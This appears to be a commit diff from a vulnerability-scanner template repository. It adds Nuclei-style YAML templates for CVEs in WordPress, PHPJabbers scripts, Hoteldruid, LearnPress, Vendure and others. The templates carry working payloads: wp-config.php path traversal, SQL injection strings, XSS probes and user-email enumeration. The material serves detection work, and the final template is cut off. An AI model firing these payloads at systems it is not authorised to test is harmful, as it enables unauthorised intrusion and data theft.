{"ID":"CVE-2024-9234","Info":{"Name":"GutenKit \u003c= 2.1.0 - Arbitrary File Upload","Severity":"critical","Description":"The GutenKit Page Builder Blocks, Patterns, and Templates for Gutenberg Block Editor plugin for WordPress is vulnerable to arbitrary file uploads due to a missing capability check on the install_and_activate_plugin_from_external() function (install-active-plugin REST API endpoint) in all versions up to, and including, 2.1.0. This makes it possible for unauthenticated attackers to install and activate arbitrary plugins, or utilize the functionality to upload arbitrary files spoofed like plugins.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-9234.yaml"}
{"ID":"CVE-2024-9463","Info":{"Name":"PaloAlto Networks Expedition - Remote Code Execution","Severity":"critical","Description":"An OS command injection vulnerability in Palo Alto Networks Expedition allows an unauthenticated attacker to run arbitrary OS commands as root in Expedition, resulting in disclosure of usernames, cleartext passwords, device configurations, and device API keys of PAN-OS firewalls.\n","Classification":{"CVSSScore":"9.9"}},"file_path":"http/cves/2024/CVE-2024-9463.yaml"}
{"ID":"CVE-2024-9465","Info":{"Name":"Palo Alto Expedition - SQL Injection","Severity":"high","Description":"An SQL injection vulnerability in Palo Alto Networks Expedition allows an unauthenticated attacker to reveal Expedition database contents, such as password hashes, usernames, device configurations, and device API keys. With this, attackers can also create and read arbitrary files on the Expedition system.\n","Classification":{"CVSSScore":"8.2"}},"file_path":"http/cves/2024/CVE-2024-9465.yaml"}
{"ID":"CVE-2001-1473","Info":{"Name":"Deprecated SSHv1 Protocol Detection","Severity":"high","Description":"SSHv1 is deprecated and has known cryptographic issues.","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2001/CVE-2001-1473.yaml"}

View File

@ -1 +1 @@
927dc1164f3b6743928b787a83f64ae5
8c67353fa955fe5e523f3418b513af74

View File

@ -1 +1 @@
3.2.9
3.3.0

View File

@ -1 +1 @@
2.2.80
2.2.81

View File

@ -1 +1 @@
1.36.0
1.36.1

View File

@ -1 +1 @@
20240820
20241019

View File

@ -1 +1 @@
1.137.0
1.138.0

View File

@ -1 +1 @@
3.12.4
3.12.5

View File

@ -1 +1 @@
4.9.17
4.9.18

View File

@ -1 +1 @@
8.5.7
8.5.8

View File

@ -1 +1 @@
2.4.0
2.4.1

View File

@ -1 +1 @@
7.2.2
7.3.0

View File

@ -1 +1 @@
5.0.1
5.0.3

View File

@ -1 +1 @@
6.7.0
6.7.1

View File

@ -1 +1 @@
14.10.2
14.10.3

View File

@ -1 +1 @@
0.9.106
0.9.107

View File

@ -0,0 +1,55 @@
id: CVE-2023-2745
info:
name: WordPress Core <=6.2 - Directory Traversal
author: nqdung2002
severity: medium
description: |
WordPress Core is vulnerable to Directory Traversal in versions up to, and including, 6.2, via the wp_lang parameter.
impact: |
This allows unauthenticated attackers to access and load arbitrary translation files. In cases where an attacker is able to upload a crafted translation file onto the site, such as via an upload form, this could be also used to perform a Cross-Site Scripting attack.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-2745
- https://www.cvedetails.com/cve/CVE-2023-2745/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cwe-id: CWE-22
metadata:
max-request: 3
framework: wordpress
tags: cve,cve2023,wpscan,disclosure,wp,wordpress,lfi
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body, "/wp-content/plugins")'
internal: true
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-login.php?wp_lang=../../../../../../../wp-config.php HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains_all(body_2, "DB_NAME", "DB_PASSWORD")'
- 'status_code_2 == 200'
condition: and
# digest: 4b0a00483046022100ce32b073284e04166ce876b9a6a16bc765f3e5745d23bc5993115598f48a869d022100aed9aa693ea8ede7510ca9a1750a24a3e6040921a33e6690aef4a0877f0a727e:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,66 @@
id: CVE-2023-38040
info:
name: Revive Adserver 5.4.1 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
A reflected XSS vulnerability exists in Revive Adserver 5.4.1 and earlier versions.
impact: |
Allows attackers to execute malicious scripts in the context of a victim's browser
remediation: |
Upgrade Revive Adserver to version 5.4.2 or later to mitigate the vulnerability
reference:
- https://hackerone.com/reports/1694171
- https://nvd.nist.gov/vuln/detail/CVE-2023-38040
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-38040
cwe-id: CWE-79
cpe: cpe:2.3:a:revive-adserver:revive_adserver:*:*:*:*:*:*:*:*
metadata:
max-request: 2
shodan-query: http.favicon.hash:106844876
fofa-query: icon_hash="106844876"
vendor: revive-adserver
product: revive_adserver
tags: cve,cve2023,revive-adserver,xss
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}"
host-redirects: true
max-redirects: 2
matchers:
- type: word
part: body
words:
- 'Revive Adserver'
internal: true
- method: GET
path:
- "{{BaseURL}}/www/delivery/al.php?zoneid=1&layerstyle=geocities&closetext=%3Cscript%3Ealert(document.domain);%3C/script%3E"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<script>alert(document.domain);</script>'
- type: word
part: content_type
words:
- text/html
- type: status
status:
- 200
# digest: 4b0a00483046022100b00be6c2bc10d5c74068721e90b769ca0da79d72624731e671c209326e77588f022100b64ee7945aff59435e2c7f49b2e89b9ba214f681f0938b4ada12ddda1b50f0ca:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,52 @@
id: CVE-2023-39560
info:
name: ECTouch v2 - SQL Injection
author: s4e-io
severity: critical
description: |
ECTouch v2 was discovered to contain a SQL injection vulnerability via the $arr['id'] parameter at \default\helpers\insert.php.
reference:
- https://wiki.bachang.org/doc/2582/
- https://nvd.nist.gov/vuln/detail/CVE-2023-39560
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-39560
cwe-id: CWE-89
epss-score: 0.00139
epss-percentile: 0.50318
cpe: cpe:2.3:a:ectouch:ectouch:2.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: ectouch
product: ectouch
fofa-query: icon_hash="127711143"
tags: cve,cve2023,ectouch,sqli
http:
- raw:
- |
GET /index.php?m=default&c=user&a=register&u=0 HTTP/1.1
Host: {{Hostname}}
Referer: 554fcae493e564ee0dc75bdf2ebf94cabought_notes|a:1:{s:2:"id";s:49:"0&&updatexml(1,concat(0x7e,(database()),0x7e),1)#";}
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "XPATH syntax error: '~[^~]+~'<br>"
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- "XPATH syntax error: '~([a-z0-9]+)~'"
# digest: 490a0046304402206fd5118214bb1e6d4b5cd9172d048ac3bcc0a6f6e7946f709c98cbd4c3b72e3c0220109355c2a5fac4c24eea2cb504fa0ea62a366177d2a38a909da45992893c0a61:922c64590222798bb761d5b6d8e72950

View File

@ -36,7 +36,7 @@ http:
matchers:
- type: dsl
dsl:
- 'status_code == 200 && contains(body, "tvcmsblog")'
- 'contains_any(tolower(response), "prestashop", "tvcmsblog")'
internal: true
- raw:
@ -73,4 +73,4 @@ http:
- 'status_code_2 == 200 && contains(body_2, "tvcmsblog")'
- 'status_code_2 == 200 && status_code_3 == 302'
condition: and
# digest: 490a0046304402203c545f322a051e024e1d2b29bb2016a4e2883d1723307b29fbc7b3462843fb6d0220449ace8459c0404af1a0731032923e18821abe4267ca4224bbcfa6302fe82bc3:922c64590222798bb761d5b6d8e72950
# digest: 490a0046304402204cb71fbf7481ceef3f0d927c3774d07ed82cfd448fc897d65a0fd88c154d643e022040b7e1c42c335323c7fac2799ee2878d3f82121f12c36242021836a7b61d0046:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,43 @@
id: CVE-2023-40749
info:
name: PHPJabbers Food Delivery Script v3.0 - SQL Injection
author: ritikchaddha
severity: critical
description: |
PHPJabbers Food Delivery Script v3.0 is vulnerable to SQL Injection in the "column" parameter of index.php.
reference:
- https://medium.com/@tfortinsec/multiple-vulnerabilities-in-phpjabbers-part-3-40fc3565982f
- https://nvd.nist.gov/vuln/detail/CVE-2023-40749
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-40749
cwe-id: CWE-89
cpe: cpe:2.3:a:phpjabbers:food_delivery_script:3.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: html:"PHPJabbers"
vendor: phpjabbers
product: food_delivery_script
tags: cve,cve2023,phpjabbers,food-delivery,sqli
http:
- method: POST
path:
- "{{BaseURL}}/index.php?controller=pjAdminOrders%26action%3dpjActionGetNewOrder%26column%3d(SELECT+(CASE+WHEN+(4213%3d4213)+THEN+0x63726561746564+ELSE+(SELECT+7877+UNION+SELECT+7153)+END))%26direction%3dASC%26page%3d1%26rowCount%3d50%26q%3d%26type%3d"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "class <strong>pjAdminOrdersaction"
- "didn't exists"
condition: and
- type: status
status:
- 200
# digest: 4a0a004730450220169b25e65473dce9e40a186e2c6f5369ece53dd627d3dbd533192f7bdc25495a022100bb08a3f5946009bfbe428055fb7e260e22b5755991462b2a350315250fc20604:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,49 @@
id: CVE-2023-40750
info:
name: PHPJabbers Yacht Listing Script v1.0 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
There is a Cross Site Scripting (XSS) vulnerability in the "action" parameter of index.php in PHPJabbers Yacht Listing Script v1.0.
reference:
- https://medium.com/@tfortinsec/multiple-vulnerabilities-in-phpjabbers-part-3-40fc3565982f
- https://nvd.nist.gov/vuln/detail/CVE-2023-40750
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-40750
cwe-id: CWE-79
cpe: cpe:2.3:a:phpjabbers:yacht_listing_script:1.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: html:"PHPJabbers"
fofa-query: body="PHPJabbers"
vendor: phpjabbers
product: yacht_listing_script
tags: cve,cve2023,phpjabbers,yacht-listing,xss
http:
- method: POST
path:
- "{{BaseURL}}/index.php?controller=pjAdmin&action=%3Cimg+src%3Dx+onerror%3Dprompt%28document.domain%29%3E"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<img src=x onerror=prompt(document.domain)>"
- "didn't exists"
condition: and
- type: word
part: content_type
words:
- text/html
- type: status
status:
- 200
# digest: 4b0a00483046022100d1657c4a3a0c7a62189db9fe9a0a27eb73ea6c2abcfad6777d18a11120c52ae5022100d57533306674f0b02d55c09681194eca967616aa7e7061b932a8b54e78d083ca:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,49 @@
id: CVE-2023-40751
info:
name: PHPJabbers Fundraising Script v1.0 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
PHPJabbers Fundraising Script v1.0 is vulnerable to Cross Site Scripting (XSS) via the "action" parameter of index.php.
reference:
- https://medium.com/@tfortinsec/multiple-vulnerabilities-in-phpjabbers-part-3-40fc3565982f
- https://nvd.nist.gov/vuln/detail/CVE-2023-40751
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-40751
cwe-id: CWE-79
cpe: cpe:2.3:a:phpjabbers:fundraising_script:1.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: html:"PHPJabbers"
fofa-query: body="PHPJabbers"
vendor: phpjabbers
product: fundraising_script
tags: cve,cve2023,phpjabbers,fundraising,xss
http:
- method: POST
path:
- "{{BaseURL}}/index.php?controller=pjAdmin&action=%3Cimg+src%3Dx+onerror%3Dprompt%28document.domain%29%3E"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<img src=x onerror=prompt(document.domain)>"
- "didn't exists"
condition: and
- type: word
part: content_type
words:
- text/html
- type: status
status:
- 200
# digest: 4b0a00483046022100814a41923245651087adec513455171e5a018ef48b4f502ff356fafea0ca626e02210081d2c2cb89df7aa055aeb62f9c1fd3fc0d1f4e466c0a7e64bb837c81272d64d0:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,50 @@
id: CVE-2023-40752
info:
name: PHPJabbers Make an Offer Widget v1.0 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
There is a Cross Site Scripting (XSS) vulnerability in the "action" parameter of index.php in PHPJabbers Make an Offer Widget v1.0.
reference:
- https://medium.com/@tfortinsec/multiple-vulnerabilities-in-phpjabbers-part-3-40fc3565982f
- https://nvd.nist.gov/vuln/detail/CVE-2023-40752
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-40752
cwe-id: CWE-79
cpe: cpe:2.3:a:phpjabbers:make_an_offer_widget:1.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: html:"PHPJabbers"
fofa-query: body="PHPJabbers"
vendor: phpjabbers
product: make_an_offer_widget
tags: cve,cve2023,phpjabbers,make-an-offer-widget,xss
http:
- method: POST
path:
- "{{BaseURL}}/index.php?controller=pjAdmin&action=%3Cimg+src%3Dx+onerror%3Dprompt%28document.domain%29%3E"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<img src=x onerror=prompt(document.domain)>"
- "didn't exists"
condition: and
- type: word
part: content_type
words:
- text/html
- type: status
status:
- 200
# digest: 490a0046304402207a50d8a5903131f5ad0e4a03978b621be03dbdd9c59cf3c181aee8f1402532c40220441ff6a7854183da8574e01f39f3540f9fe9da7b9f2826dff15d4193c47c456d:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,58 @@
id: CVE-2023-40753
info:
name: PHPJabbers Ticket Support Script v3.2 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
There is a Cross Site Scripting (XSS) vulnerability in the message parameter of index.php in PHPJabbers Ticket Support Script v3.2.
reference:
- https://medium.com/@tfortinsec/multiple-vulnerabilities-in-phpjabbers-part-3-40fc3565982f
- https://nvd.nist.gov/vuln/detail/CVE-2023-40753
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2023-40753
cwe-id: CWE-79
cpe: cpe:2.3:a:phpjabbers:ticket_support_script:3.2:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
shodan-query: html:"PHPJabbers"
fofa-query: body="PHPJabbers"
vendor: phpjabbers
product: ticket_support_script
tags: cve,cve2023,phpjabbers,ticket-support-script,xss,authenticated
http:
- raw:
- |
POST /index.php?controller=pjBase&action=pjActionLogin HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
login_user=1&login_email={{username}}&login_password={{password}}&login_captcha=
- |
GET /notification_create=1&type=NewTicket&department_id%5B%5D=2&user_id%5B%5D=1&i18n%5B1%5D%5Bsubject%5D=a&i18n%5B1%5D%5Bmessage%5D=%3C%2Ftextarea%3E%3CscrIpt%3Ealert(document.domain)%3B%3C%2FscRipt%3E%3Ctextarea%3E HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body_2
words:
- "</textarea><scrIpt>alert(document.domain);</scRipt><textarea>"
- "Subject"
- "Recipient users"
condition: and
- type: word
part: content_type_2
words:
- text/html
- type: status
status:
- 200
# digest: 4b0a00483046022100b5e30d14909e56d27d4d6ba2eb80a538376145a576224e16260ddd6e9ded4d9c022100b98dea5283ad9109428af1ba26d77ec43c413121bd6c8f82ea7cdf1fc01e5846:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,63 @@
id: CVE-2023-40755
info:
name: PHPJabbers Callback Widget v1.0 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
There is a Cross Site Scripting (XSS) vulnerability in the "theme" parameter of preview.php in PHPJabbers Callback Widget v1.0.
reference:
- https://medium.com/@tfortinsec/multiple-vulnerabilities-in-phpjabbers-part-3-40fc3565982f
- https://nvd.nist.gov/vuln/detail/CVE-2023-40755
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-40755
cwe-id: CWE-79
cpe: cpe:2.3:a:phpjabbers:callback_widget:1.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: html:"PHPJabbers"
fofa-query: body="PHPJabbers"
vendor: phpjabbers
product: callback_widget
tags: cve,cve2023,phpjabbers,callback-widget,xss
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}"
host-redirects: true
max-redirects: 2
matchers:
- type: word
part: body
words:
- 'PHPJabbers'
case-insensitive: true
internal: true
- method: GET
path:
- "{{BaseURL}}/preview.php?theme=theme10dnel8%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3Eko0so"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'theme=theme10dnel8"><script>alert(document.domain)</script>ko0'
- type: word
part: content_type
words:
- text/html
- type: status
status:
- 200
# digest: 4b0a00483046022100ddb3cce58dd092cf151d9068ec7d3f2160ec2e50275f1a0c49033334905928f402210099388d0fa52081e816c46cc4ad8058a0886a9800790ac5dead6bfe8bfe90acff:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,79 @@
id: CVE-2023-43373
info:
name: Hoteldruid v3.0.5 - SQL Injection
author: ritikchaddha
severity: critical
description: |
Hoteldruid v3.0.5 was discovered to contain a SQL injection vulnerability via the n_utente_agg parameter at /hoteldruid/interconnessioni.php.
impact: |
Allows attackers to execute arbitrary SQL queries and potentially gain unauthorized access to the database.
remediation: |
Update Hoteldruid to a patched version or apply vendor-supplied fixes to mitigate the SQL Injection vulnerability.
reference:
- https://flashy-lemonade-192.notion.site/SQL-injection-in-hoteldruid-version-3-0-5-via-n_utente_agg-parameter-948a6d724b5348f3867ee6d780f98f1a
- https://nvd.nist.gov/vuln/detail/CVE-2023-43373
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-43373
cwe-id: CWE-89
epss-score: 0.00076
epss-percentile: 0.31944
cpe: cpe:2.3:a:digitaldruid:hoteldruid:3.0.5:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: digitaldruid
product: hoteldruid
fofa-query: title="hoteldruid"
shodan-query: title:"hoteldruid"
tags: cve,cve2023,hoteldruid,sqli
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(tolower(body), "hoteldruid")'
internal: true
- raw:
- |
POST /interconnessioni.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="anno"
2023
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="id_sessione"
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="modifica_interconnessione"
SI
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="modifica_utente_agg"
SI
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="n_utente_agg"
1' AND (SELECT 3869 FROM (SELECT(SLEEP(7)))qSXB)-- QMbZ
------------YWJkMTQzNDcw--
matchers:
- type: dsl
dsl:
- 'duration>=7'
- 'status_code == 200'
condition: and
# digest: 4a0a00473045022100bdabd4b68a552133f2418b8249b27494902e27dff14c51050e6ca3e01db88d7b02207203d5ecf3f4f24c2756cd5c37a41c070b16c5ca90714d74860c53c7d7b2ecd5:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,82 @@
id: CVE-2023-5558
info:
name: LearnPress < 4.2.5.5 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
The LearnPress WordPress plugin before 4.2.5.5 does not sanitise and escape user input before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.
impact: |
Allows attackers to execute malicious scripts in the context of the victim's browser.
remediation: |
Update LearnPress WordPress Plugin to the latest version to mitigate the vulnerability.
reference:
- https://wpscan.com/vulnerability/4efd2a4d-89bd-472f-ba5a-f9944fd4dd16/
- https://nvd.nist.gov/vuln/detail/CVE-2023-5558
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-5558
cwe-id: CWE-79
epss-score: 0.00046
epss-percentile: 0.15636
cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 6
vendor: thimpress
product: learnpress
framework: wordpress
tags: cve,cve2023,wp,wp-plugin,wordpress,learnpress,xss,authenticated
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
words:
- "/wp-content/plugins/learnpress"
internal: true
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /{{path}} HTTP/1.1
Host: {{Hostname}}
payloads:
path:
- '?param=value%22%27%3Balert(document.domain)%3C!--'
- '?param=value%22%27%3Balert(document.domain)%3Bb=%27'
- '?%27-alert(%60XSS%60)-%27=a'
- 'instructors/?param=value%26%23x3C%3B%2Fscript%26%23x3E%3B%26%23x3C%3Bscript%26%23x3E%3Balert%26%23x60%3Bdocument.domain%26%23x60%3B%26%23x3C%3B%2Fscript%26%23x3E%3B%0A'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "\"';alert(document.domain)<!--"
- "\"';alert(document.domain);b='"
- "'-alert(`XSS`)-'=a"
- "</script><script>alert`document.domain`</script>"
condition: or
- type: word
part: content_type
words:
- text/html
- type: status
status:
- 200
# digest: 4a0a0047304502210098ad06bb1037d9e465913c01382f2a8b346e05dbc091ecd1474c7531d7b6e9ef0220630b4a959dafe785cd2c5a2a33037ffd0ef5130658a150526ae4e476479ca9bd:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,67 @@
id: CVE-2023-5561
info:
name: WordPress Core - Post Author Email Disclosure
author: nqdung2002
severity: medium
description: |
WordPress Core is vulnerable to Sensitive Information Exposure in versions between 4.7.0 and 6.3.1 via the User REST endpoint. While the search results do not display user email addresses unless the requesting user has the 'list_users' capability, the search is applied to the user_email column.
impact: |
This can allow unauthenticated attackers to brute force or verify the email addresses of users with published posts or pages on the site.
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-core/wordpress-core-470-631-sensitive-information-exposure-via-user-search-rest-endpoint?asset_slug=wordpress
- https://wpscan.com/vulnerability/19380917-4c27-4095-abf1-eba6f913b441/
- https://nvd.nist.gov/vuln/detail/CVE-2023-5561
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2023-5561
cwe-id: CWE-200
epss-score: 0.00072
epss-percentile: 0.32109
cpe: cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: wordpress
product: wordpress
framework: wordpress
shodan-query:
- cpe:"cpe:2.3:a:wordpress:wordpress"
- http.component:"wordpress"
fofa-query: body="oembed" && body="wp-"
tags: cve,cve2023,wpscan,disclosure,wp,wordpress,email,exposure
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body, "/wp-content/plugins")'
internal: true
- method: GET
path:
- "{{BaseURL}}/{{route}}search=@"
stop-at-first-match: true
payloads:
route:
- "wp-json/wp/v2/users?"
- "?rest_route=/wp/v2/users&"
attack: clusterbomb
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "application/json")'
- 'contains_all(body, "[{\"id", "name\":", "@")'
condition: and
# digest: 490a004630440220628e676e9da493d7e5323dfd1ff0a16ddee0a8507691358b486cc9a14729743102207edca00957368f29586561dc14f5081c99389e4635da39a7f27a5401076a1183:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,135 @@
id: CVE-2024-4439
info:
name: WordPress Core <6.5.2 - Cross-Site Scripting
author: nqdung2002
severity: high
description: |
WordPress Core is vulnerable to Stored Cross-Site Scripting via user display names in the Avatar block in various versions up to 6.5.2 due to insufficient output escaping on the display name.
impact: |
This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. In addition, it also makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that have the comment block present and display the comment author's avatar.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-4439
- https://www.cvedetails.com/cve/CVE-2024-4439/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cve-id: CVE-2024-4439
cwe-id: CWE-80
epss-score: 0.00064
epss-percentile: 0.28966
metadata:
max-request: 10
framework: wordpress
tags: wpscan,xss,wp,wordpress,footnote,sxss,post
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/ HTTP/1.1
Host: {{Hostname}}
- |
GET /wp-admin/post-new.php HTTP/1.1
Host: {{Hostname}}
- |
POST /?rest_route=/wp/v2/posts/{{postid}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
X-HTTP-Method-Override: PUT
X-WP-Nonce: {{post_nonce}}
{"id":{{postid}},"title":"CVE-2024-4439","content":"<!-- wp:avatar {\"isLink\":true,\"linkTarget\":\"_blank\"} /-->","status":"publish"}
- |
GET /wp-admin/profile.php HTTP/1.1
Host: {{Hostname}}
- |
POST /wp-admin/profile.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
_wpnonce={{profile_nonce}}&first_name=%22+onmouseover%3Dalert%28document.domain%29%3B+%2F%2F&last_name=&nickname=admin&display_name=%22+onmouseover%3Dalert%28document.domain%29%3B+%2F%2F&email=admin%40gmail.com&action=update&user_id={{userid}}&submit=Update+Profile
- |
GET wp-login.php?action=logout&_wpnonce={{logout_nonce}} HTTP/1.1
Host: {{Hostname}}
- |
POST /wp-comments-post.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
comment=Unauthenticated+Comment&author=%22+onmouseover%3Dalert%28document.domain%29%3B+%2F%2F&email=example%40gmail.com&url=example.com&submit=Post+Comment&comment_post_ID={{postid}}
- |
GET /?p={{postid}} HTTP/1.1
Host: {{Hostname}}
host-redirects: true
max-redirects: 2
matchers:
- type: word
part: body_9
words:
- 'aria-label="(" onmouseover=alert(document.domain);'
- type: word
part: header_9
words:
- 'text/html'
- type: status
status:
- 200
extractors:
- type: regex
name: userid
part: body_2
group: 1
internal: true
regex:
- 'user_id=(\d+)'
- type: regex
name: logout_nonce
part: body_2
group: 2
internal: true
regex:
- 'action=logout&(.*);\_wpnonce=(.{10})'
- type: regex
name: postid
part: body_3
group: 1
internal: true
regex:
- 'post=(\d+)'
- type: regex
name: post_nonce
part: body_3
group: 1
internal: true
regex:
- 'createNonceMiddleware\(\s"(.*)\"\s\)'
- type: regex
name: profile_nonce
part: body_5
group: 1
internal: true
regex:
- 'name=\"\_wpnonce\"\svalue="(.{10})\"\s'
# digest: 4a0a0047304502200bab44aa9194a8dd8fc4cbe79783d6b30f396bf2bb8d7f09c273d371ee1dc393022100ec79e714618c986ca30408c0969e82e97603f9f1fb30effb526046afe10fbab3:922c64590222798bb761d5b6d8e72950

View File

@ -0,0 +1,46 @@
id: CVE-2024-48914
info:
name: Vendure - Arbitrary File Read
author: s4e-io
severity: critical
description: |
Vendure is an open-source headless commerce platform. Prior to versions 3.0.5 and 2.3.3, a vulnerability in Vendure's asset server plugin allows an attacker to craft a request which is able to traverse the server file system and retrieve the contents of arbitrary files, including sensitive data such as configuration files, environment variables, and other critical data stored on the server. In the same code path is an additional vector for crashing the server via a malformed URI.
impact: |
Allows attackers to read arbitrary files on the server, including sensitive data such as configuration files and environment variables.
remediation: |
Patches are available in versions 3.0.5 and 2.3.3. Some workarounds are also available. One may use object storage rather than the local file system, e.g. MinIO or S3, or define middleware which detects and blocks requests with urls containing `/../`.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-48914
- https://github.com/EQSTLab/CVE-2024-48914
- https://github.com/vendure-ecommerce/vendure
- https://github.com/vendure-ecommerce/vendure/blob/801980e8f599c28c5059657a9d85dd03e3827992/packages/asset-server-plugin/src/plugin.ts#L352-L358
- https://github.com/vendure-ecommerce/vendure/commit/e2ee0c43159b3d13b51b78654481094fdd4850c5
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
cvss-score: 9.1
cve-id: CVE-2024-48914
cwe-id: CWE-20
epss-score: 0.00045
epss-percentile: 0.16453
metadata:
verified: true
max-request: 1
vendor: vendure-ecommerce
product: vendure
fofa-query: "Vendure"
tags: cve,cve2024,vendure,lfi,file-read
http:
- method: GET
path:
